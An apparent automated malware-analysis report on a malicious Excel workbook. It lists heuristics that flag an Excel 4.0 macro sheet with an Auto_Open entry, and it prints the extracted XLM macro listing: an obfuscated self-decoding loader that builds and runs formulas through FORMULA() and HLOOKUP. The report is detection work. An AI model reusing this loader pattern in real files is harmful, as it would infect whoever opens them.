MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6427 bytes |
SHA-256: 16ea3e87d0f43be1a65586ea34f1fa398c2823632fb1723d48e64552d4500396 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - wtn
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!F131
' 0018 25 LABEL : Cell Value, String Constant - CmrvZrVNFr len=0
' 0018 26 LABEL : Cell Value, String Constant - dLToYovglYq len=0
' 0018 26 LABEL : Cell Value, String Constant - EpRUzoSdtht len=0
' 0018 22 LABEL : Cell Value, String Constant - eWcyTDi len=0
' 0018 24 LABEL : Cell Value, String Constant - FyxYBbroO len=0
' 0018 22 LABEL : Cell Value, String Constant - HjnNJKO len=0
' 0018 27 LABEL : Cell Value, String Constant - HPtVtMRThlJh len=0
' 0018 22 LABEL : Cell Value, String Constant - iMYSixR len=0
' 0018 25 LABEL : Cell Value, String Constant - KQmiBEodXA len=0
' 0018 20 LABEL : Cell Value, String Constant - krsQI len=0
' 0018 25 LABEL : Cell Value, String Constant - LhUFYfLyhA len=0
' 0018 26 LABEL : Cell Value, String Constant - mZjDHWpbchJ len=0
' 0018 23 LABEL : Cell Value, String Constant - NkdaGVBE len=0
' 0018 27 LABEL : Cell Value, String Constant - pbgxPTrhgmvl len=0
' 0018 20 LABEL : Cell Value, String Constant - RhdeE len=0
' 0018 23 LABEL : Cell Value, String Constant - SWYAoCCE len=0
' 0018 21 LABEL : Cell Value, String Constant - tWRfkf len=0
' 0018 21 LABEL : Cell Value, String Constant - ufzQpc len=0
' 0018 24 LABEL : Cell Value, String Constant - yTbSQoCWn len=0
' 0018 22 LABEL : Cell Value, String Constant - zmCWcrT len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' wtn,F42,"SET.NAME("mZjDHWpbchJ",VALUE("0"))",""
' wtn,F45,"SET.NAME("HjnNJKO",mZjDHWpbchJ)",""
' wtn,F50,"SET.NAME("RhdeE",mZjDHWpbchJ)",""
' wtn,F55,"SET.NAME("LhUFYfLyhA",COUNTA(HPtVtMRThlJh))",""
' wtn,F58,"SET.NAME("tWRfkf",COUNTA(yTbSQoCWn))",""
' wtn,F63,[],""
' wtn,F68,"SET.NAME("ufzQpc","")",""
' wtn,F71,"HjnNJKO",""
' wtn,F75,"SET.NAME("krsQI",HLOOKUP("*",HPtVtMRThlJh,HjnNJKO,FALSE))",""
' wtn,F77,"KQmiBEodXA",""
' wtn,F79,"SET.NAME("SWYAoCCE",mZjDHWpbchJ)",""
' wtn,F82,[],""
' wtn,F84,"SWYAoCCE",""
' wtn,F88,"EpRUzoSdtht",""
' wtn,F93,"CmrvZrVNFr",""
' wtn,F98,"zmCWcrT",""
' wtn,F102,"SET.NAME("pbgxPTrhgmvl",VALUE(HLOOKUP("*",yTbSQoCWn,zmCWcrT,FALSE)))",""
' wtn,F104,"FyxYBbroO",""
' wtn,F107,"ufzQpc",""
' wtn,F109,"RhdeE",""
' wtn,F112,NEXT(),""
' wtn,F114,"iMYSixR",""
' wtn,F116,"SET.NAME("f",INT(T(FORMULA(T(ufzQpc)&"",""&T(iMYSixR)))))",""
' wtn,F118,"eWcyTDi",""
' wtn,F122,NEXT(),""
' wtn,F127,RETURN(),""
' wtn,F160,"SET.NAME("dLToYovglYq",F42)",""
' wtn,F164,"HPtVtMRThlJh",""
' wtn,F166,"SET.NAME("yTbSQoCWn",R74C13)",""
' wtn,F168,"SET.NAME("eWcyTDi",177)",""
' wtn,F171,"SET.NAME("NkdaGVBE",6)",""
' wtn,F176,dLToYovglYq(),""
' wtn,F177,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.